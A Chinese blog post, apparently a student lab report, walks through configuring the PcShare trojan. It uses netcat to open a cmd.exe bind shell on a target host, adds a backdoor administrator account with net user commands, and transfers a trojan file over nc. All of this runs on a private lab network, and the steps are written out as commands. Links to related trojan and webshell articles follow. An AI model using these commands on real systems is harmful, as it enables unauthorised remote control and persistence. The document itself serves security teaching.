木马程序的配置和使用实验

最新推荐文章于 2024-02-17 21:07:45 发布
最新推荐文章于 2024-02-17 21:07:45 发布
阅读量1.8k 收藏 9
点赞数
caesarding07@gmail.com
本文链接:https://blog.csdn.net/qq_44628595/article/details/109592260
版权

木马程序的配置和使用实验

实验准备

控制机A和被控制机都需要安装两个软件

实验环境

  1. 控制机A
  2. 目标主机B
    在这里插入图片描述

IP:192.168.6.128

实验过程

生成木马控制文件

  1. 打开pcShare生成控制文件
    不建议使用80端口,80端口一般被web占用,或者被保护
    ip地址要控制在自己列表范围内(随意)
    在这里插入图片描述
    点击生成,建议放在控制机A nc程序的同级目录下
    在这里插入图片描述

通过nc.exe 开启远程shell

  1. 在目标主机(B)开启端口监听
    切换到nc.exe软件所在的目录
    在这里插入图片描述
    开启端口监听
nc -L -d -e cmd.exe -p 8888

在这里插入图片描述
2. 控制机A连接目标主机并开启远程命令行shell
这个过程中目标主机B的提示符窗口不能关闭,保持时刻监听
切换到nc程序所在的目录,输入命令

nc 192.168.6.120 8888

在这里插入图片描述

在目标主机创建新用户

net user admin_test "pasword" /add

在这里插入图片描述

net localgroup administrators admin_test /add

在这里插入图片描述

net user

在这里插入图片描述

通过远程shell传输木马文件

参考linux nc 传输文件
端口号随意

nc -v -l -p 7777 >test.exe

在这里插入图片描述
新开一个命令提示符传输文件
在这里插入图片描述

传输成功
在这里插入图片描述
在这里插入图片描述

实验问题

发生系统错误 5。 拒绝访问

错误
发生系统错误 5。 拒绝访问在这里插入图片描述
原因
权限不足,导致创建失败
解决方案之一

  1. 打开任务管理器
    右键任务栏 选择任务管理器
    在这里插入图片描述

  2. 详细信息 > 菜单栏 > 文件 > 运行新任务
    在这里插入图片描述
    在这里插入图片描述

  3. 勾选以管理员身份运行并确认
    在这里插入图片描述

  4. 打开命令提示符后继续 执行命令

在这里插入图片描述

caesarding
关注
病毒实验四木马病毒实验
12-06
- **系统配置文件**: 修改`Win.ini`、`System.ini`等系统配置文件,加入木马程序路径,使其在系统启动时加载。 - **服务**: 创建新的系统服务来保证木马程序持续运行。 #### 四、实验操作步骤详解 1. **木马程序...
打造自己的木马分析实验
masepu的专栏
02-27 1542
打造自己的木马分析实验室       masepu    (本文已发表于黑客防线,转载请注明出处)            一、概述木马分析是一项需要技术、技巧和耐心的工作。专业人员可能先会对木马程序进行反编译,然后花大量时间分析令人目眩且晦涩难懂的汇编代码。然而对于我们来说也许只是想了解一下偶尔遇到的可疑文件,看看是不是木马,有些什么样的特点,以及控制着这些木马的主机在什么地方。要达到这个目标有没
还原入侵者
windowschengxisheji的博客
01-26 1742
一、有个进程叫名叫xd和sysmon占用大量cpu ,负载也达到3~4 xd位置如下,sysmon还未找到执行程序ps、lsof命令都没找到 /tmp目录下有些奇怪文件 文件具体时间 二、 lastb 命令显示/var/log/btmp 文件,记录登陆失败用户: tty: TTY是TeleTYpe的一个老缩写。Teletypes,或者teletypewr
信息安全实训——神奇的木马
Clementi1的博客
08-10 1574
信息安全实训——神奇的木马
安全防御 --- 恶意代码、防病毒
weixin_62443409的博客
04-05 1万+
硬盘系统分配表扇区(主引导区)、硬盘引导扇区、软盘引导扇区、可执行文件(.exe)、命令文件(.com)、覆盖文件(.ovl)、COMMAND文件、IBMIBO文件、IBMDOS文件。计算机病毒运行染毒的宿主程序,病毒夺取控制权;将病毒程序嵌入感染目标中。
(2.1)【经典木马-冰河木马】详细介绍,原理、使用方法
07-09 8128
【经典木马-冰河木马】
2022秋季信息安全实验3
09-21
7. **网络安全攻防**:实验可能包括基本的网络攻击(如DoS攻击)和防御策略,以及入侵检测系统(IDS)和入侵防御系统(IPS)的使用。 8. **代码审计**:通过对邹荣辉提供的代码进行审计,学习如何发现和修复安全...
web安全技术-实验六、文件上传漏洞.doc
08-20
【文件上传漏洞】是Web应用安全领域中的一个重要概念,它主要出现在允许用户上传文件到服务器的应用程序中。当系统没有正确地验证或过滤上传的文件类型时,攻击者可以利用这个漏洞上传恶意代码,例如病毒、木马或者...
木马攻防技术
03-08
木马攻防技术是网络安全领域中的一个重要方面,涉及到对木马程序的识别、防护和应对策略。木马,源于古希腊神话的特洛伊木马故事,是一种隐蔽性极强的恶意软件,通常由两部分组成:服务器端和客户端。攻击者通过将...
2022广工网络安全实验(实训系统考核题+综合题+心得).docx
07-01
- **实验目的**:熟悉Iptables的配置使用方法。 - **实验总结**:学生通过实验学会了Iptables的基本命令和配置方法,增强了网络安全防护能力。 以上总结涵盖了密码学算法、安全服务、恶意软件分析等多个方面,...
基础木马实验
Goinhn
02-29 771
基础木马实验 使用大白鲨远程管理工具 实验环境 客户端:windows xp 服务端:windows server 2003 r2 本地攻击 启动大白鲨软件 配置程序 ip处设置为当前主机的ip地址 点击生成服务端: 可以对生成的服务端程序进行修改文件名和更换图标,使得更具有隐蔽性,生成之后在主机中进行点击出发木马程序: 客户端程序中出现该上线的主机,可以在客户端中进行一些列的操作,...
计算机病毒实验--nc命令
weixin_43749051的博客
11-21 793
一.实验环境: 主机:Mac 目标机:ubuntu IP:172.16.66.134 二.实验要求 1.反弹shell 2.端口扫描 3.查看文件系统 4.文件传输 5.文本传输 6.用户创建 7.传输目录 8...
【黑客渗透】-- 远程木马控制
最新发布
可惜已不在
02-17 3960
随着信息技术的飞速发展,网络搭建和服务器搭建已成为现代社会的基石。它们如同数字世界的骨架,支撑着各类应用的运行,让信息的传递和共享变得前所未有的便捷。然而,这仅仅是开始,对于真正渴望在信息技术领域探索的人们来说,学习的道路上仍有无数高峰等待我们去攀登。此刻,我们正站在一个崭新的起点,带着对知识和技术的渴望,开启一段全新的学习篇章。在这个篇章中,我们将不满足于仅仅搭建起稳固的网络和服务器,更将深入网络攻击.学习新篇章的道路或许充满挑战,但正是这些挑战,将激发我们不断前行的动力。
蚁剑连接一句话木马演示
热门推荐
undefine
12-18 1万+
需要准备 一台虚拟机作为服务器,一台作为攻击机(可用主机),将虚拟机的网络都设置为桥接。 我这里服务器用win2008R2系统 攻击机用win10 接下来我会演示 php 的一句话木马 其他脚本语言的一句话木马使用过程和这个差别不大 在服务器上安装phpstudy 快速搭建服务器 安装成功后启动apache 尝试打开网站,看看是否成功 出现下面的页面代表成功 现在服务端就配置成功了 现在在攻击端安装菜刀,蚁剑等等类似工具,可以去看怎么
metasploit生成木马获取windowns控制权(非免杀版)
奇葩
12-06 1016
转载连接:https://zhuanlan.zhihu.com/p/66785692 写在前面 本想介绍几种生成免杀木马的方法,但经过实验发现这几种方法已经失效,可以被360或者腾讯安全管家查杀。所以本文的木马不具备免杀功能。 准备环境: 入侵机器:kali linux (IP地址:192.168.96.128) 靶机:window server 2003 (IP地址:192.168.96.1...
实验二木马分析(控制分析)实验实验三冰河木马实验
qq_30600405的博客
10-31 1万+
木马分析(隐藏分析)实验 木马分析(控制分析)实验 木马植入方法实验---冰河木马
实验一木马分析(隐藏分析)实验
qq_30600405的博客
10-27 5518
实验一木马分析(隐藏分析)实验
20155231 20155234 信息安全技术 实验四 木马及远程控制技术 实验报告
weixin_30239339的博客
11-29 489
20155231 20155234 信息安全技术 实验四 木马及远程控制技术 实验报告 姓名: 邵煜楠 学号: 20155231 日期: 2017.11.21 姓名: 昝昕明 学号: 20155234 日期: 2017.11.21 一、实验环境 操作系统:windows7 实验工具:灰鸽子远程控制、监控器、协议分析器 二、实验内容 木马生成与植入 利用木马实现远程控制 木马的删除 三、实...
冰河木马的使用实验
你的猴子呀
12-19 8914
前言: 作者是一个普通高校学生,在博客上开通了[网络安全学习]专栏,以此激励自己坚持学习。由于是初次进行博客创作、经验不足、可能比较粗糙,如有错漏之处希望大家能够指正、也欢迎大家一起交流学习。 如需查看完整学习博文(笔记)请点击 [网络安全学习] 进行查看 注:本实验只为与大家一起学习探讨网络安全学习,请勿用作恶意途径。 一、实验目的及要求 (1)了解冰河木马的使用 (2)掌握木马防范措施 二、实验仪器、设备或软件 软件:冰河木马名为冰河远程监控软件,在推出伊始便饱受追捧,作为一款强大的远程监控软件,它
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

caesarding

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值